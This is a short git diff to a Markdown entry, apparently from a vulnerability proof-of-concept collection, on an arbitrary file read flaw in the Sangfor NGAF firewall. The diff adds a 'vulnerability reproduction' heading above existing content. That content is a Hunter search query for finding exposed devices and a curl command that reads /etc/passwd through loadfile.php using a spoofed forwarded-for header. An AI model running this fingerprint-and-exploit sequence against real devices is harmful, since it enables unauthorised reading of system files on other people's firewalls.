diff --git a/深信服下一代防火墙NGAF任意文件读取漏洞.md b/深信服下一代防火墙NGAF任意文件读取漏洞.md index 60bd5e0..ba41792 100644 --- a/深信服下一代防火墙NGAF任意文件读取漏洞.md +++ b/深信服下一代防火墙NGAF任意文件读取漏洞.md @@ -7,6 +7,7 @@ ## hunter: web.body="LogInOut.php?type=logout" +## 漏洞复现 ``` curl --insecure https://:85/svpn_html/loadfile.php?file=/etc/./passwd -H "y-forwarded-for: 127.0.0.1"